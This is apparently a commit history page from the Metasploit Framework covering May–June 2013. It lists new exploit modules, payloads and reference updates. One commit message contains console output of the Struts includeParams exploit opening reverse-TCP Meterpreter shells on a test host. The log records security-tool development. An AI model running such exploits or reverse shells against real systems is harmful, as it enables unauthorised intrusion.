CG
|
571b62d19d
|
svn scanner added print_good and rport
|
2013-06-02 18:05:11 -04:00 |
sinn3r
|
cb33c5685f
|
Landing #1890 - Oracle WebCenter Content openWebdav() vulnerability
|
2013-06-02 12:35:40 -05:00 |
sinn3r
|
866ebf771b
|
Landing #1892 - Add OSVDB reference (93287)
|
2013-06-02 12:23:17 -05:00 |
Steve Tornio
|
61c8861fcf
|
add osvdb ref
|
2013-06-02 08:33:42 -05:00 |
sinn3r
|
cc951e3412
|
Modifies the exploit a little for better stability
This patch makes sure the LFH is enabled before the CGenericElement
object is created. Triggers is also modified a little.
|
2013-06-02 03:02:42 -05:00 |
jvazquez-r7
|
1917961904
|
Land #1888, @swtornio's update for OSVDB references
|
2013-06-01 16:36:59 -05:00 |
jvazquez-r7
|
1c4472a936
|
Land #1889, @swtornio update for OSVDB references
|
2013-06-01 16:32:37 -05:00 |
jvazquez-r7
|
5939ca8ce4
|
Add analysis at the end of the module
|
2013-06-01 15:59:17 -05:00 |
jvazquez-r7
|
9be8971bb0
|
Add module for ZDI-13-094
|
2013-06-01 15:44:01 -05:00 |
Steve Tornio
|
8671ae9de7
|
add osvdb ref
|
2013-06-01 14:27:50 -05:00 |
David Maloney
|
64bc6b5c2b
|
Migrate factories to mdm
let mdm handle msot of the factories
|
2013-06-01 14:25:30 -05:00 |
David Maloney
|
d48bca2c70
|
Gemfile and schema changes
|
2013-06-01 14:09:40 -05:00 |
Steve Tornio
|
80f1e98952
|
added osvdb refs
|
2013-06-01 07:04:43 -05:00 |
James Lee
|
e634672244
|
Land #1887, ibm spss zdi reference
|
2013-05-31 21:33:04 -05:00 |
jvazquez-r7
|
f8e9535c39
|
Add ZDI reference
|
2013-05-31 20:50:53 -05:00 |
sinn3r
|
d679946b7f
|
Landing #1713 - add_sub encoder for x86 payloads
|
2013-05-31 18:49:08 -05:00 |
sinn3r
|
2ac0d25413
|
Fixes e-mail format, also a whitespace
|
2013-05-31 18:47:46 -05:00 |
Roberto Soares Espreto
|
d9609fb03e
|
Was breaking with repeated commands
|
2013-05-31 18:44:48 -03:00 |
sinn3r
|
937d7fb762
|
Landing #1835 - Fix a backwards disasm bug which stomps on the depth opt
|
2013-05-31 16:28:49 -05:00 |
sinn3r
|
df2140ea59
|
Add back the tmp include check according to bannedit's feedback
|
2013-05-31 16:26:52 -05:00 |
sinn3r
|
dacc73a60f
|
Improve readability based on Egypt's feedback
|
2013-05-31 16:24:27 -05:00 |
sinn3r
|
90117c322c
|
Landing #1874 - Post API cleanup
|
2013-05-31 16:15:23 -05:00 |
sinn3r
|
e99401ea82
|
Landing #1817 - couchdb login module
|
2013-05-31 16:04:10 -05:00 |
sinn3r
|
a88321c700
|
Final touchup
|
2013-05-31 16:03:30 -05:00 |
sinn3r
|
483b5e204f
|
Missing the header
|
2013-05-31 16:00:36 -05:00 |
sinn3r
|
e398025a7f
|
I don't think what fails really matters.
|
2013-05-31 15:59:40 -05:00 |
jvennix-r7
|
eb2e735a36
|
Merge pull request #1865 from limhoff-r7/bug/module-load-cache-update
Update in-memory cache to fix file_changed? bug.
|
2013-05-31 13:21:04 -07:00 |
James Lee
|
4f6d80c813
|
Land #1804, user-settable filename for psexec
|
2013-05-31 13:34:52 -05:00 |
James Lee
|
5964d36c40
|
Fix a syntax error
Also uses a prettier syntax for setting the filename (ternary operators
are hard to read).
|
2013-05-31 13:31:36 -05:00 |
jvazquez-r7
|
146a30ec4d
|
Do minor cleanup for struts_include_params
|
2013-05-31 01:01:15 -05:00 |
jvazquez-r7
|
a7a754ae1f
|
Land #1870, @Console exploit for Struts includeParams injection
|
2013-05-31 00:59:33 -05:00 |
Tod Beardsley
|
9c771435f2
|
Touchup on author credit
|
2013-05-30 16:13:40 -05:00 |
Tod Beardsley
|
dc014ede36
|
Land #1821, x64_reverse_https payload
|
2013-05-30 16:09:33 -05:00 |
jvazquez-r7
|
d0489b5d1e
|
Delete some commas
|
2013-05-30 14:25:53 -05:00 |
jvazquez-r7
|
6abb591428
|
Do minor cleanup for lianja_db_net
|
2013-05-30 14:25:05 -05:00 |
jvazquez-r7
|
38e5c2bed2
|
Land #1877, @zeroSteiner's exploit for Lianja SQL
|
2013-05-30 14:23:45 -05:00 |
Tod Beardsley
|
67128a3841
|
Land #1821, x64_reverse_https stagers
|
2013-05-30 13:55:13 -05:00 |
Luke Imhoff
|
cc60c95243
|
Rescue Errno::ENONENT when using File.mtime for memory cache
[#47720609]
|
2013-05-30 13:16:43 -05:00 |
Luke Imhoff
|
e0e348a17e
|
Specs to ensure File.mtime error is caught.
[#47720609]
|
2013-05-30 13:09:40 -05:00 |
Luke Imhoff
|
541d287e70
|
Merge branch 'master' into bug/module-load-cache-update
|
2013-05-30 12:59:50 -05:00 |
Console
|
eb4162d41b
|
boolean issue fix
|
2013-05-30 18:15:33 +01:00 |
lsanchez-r7
|
8b488c3c6b
|
Merge pull request #1866 from dmaloney-r7/bug/mdm_session_port
Add session_port to the mdm object
SEERM #7281
|
2013-05-30 10:05:48 -07:00 |
Console
|
5fa8ecd334
|
removed magic number 109
now calculated from the actual length of all static URL elements
|
2013-05-30 17:40:43 +01:00 |
Spencer McIntyre
|
70e1379338
|
Use msvcrt in ropdb for stability.
|
2013-05-30 11:13:22 -04:00 |
Console
|
47524a0570
|
converted request params to hash merge operation
|
2013-05-30 15:36:01 +01:00 |
Console
|
51879ab9c7
|
removed unnecessary lines
|
2013-05-30 15:15:10 +01:00 |
Console
|
abb0ab12f6
|
Fix msftidy compliance
|
2013-05-30 13:10:24 +01:00 |
Console
|
5233ac4cbd
|
Progress bar instead of message spam.
|
2013-05-30 13:08:43 +01:00 |
Console
|
fb388c6463
|
Chunk length is now "huge" for POST method
minor changes to option text and changed HTTPMETHOD to an enum.
|
2013-05-30 11:30:24 +01:00 |
Console
|
ab6a2a049b
|
Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
|
2013-05-30 10:35:29 +01:00 |